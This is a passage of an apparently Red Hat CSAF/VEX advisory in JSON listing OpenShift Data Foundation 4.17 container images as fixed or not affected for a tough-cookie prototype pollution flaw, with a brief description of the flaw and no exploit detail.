"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2219310"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the tough-cookie package which allows Prototype Pollution due to improper handling of Cookies when using CookieJar in rejectPublicSuffixes=false mode. This issue arises from the manner in which the objects are initialized.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "tough-cookie: prototype pollution in cookie memstore",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x"
],
"known_not_affected": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
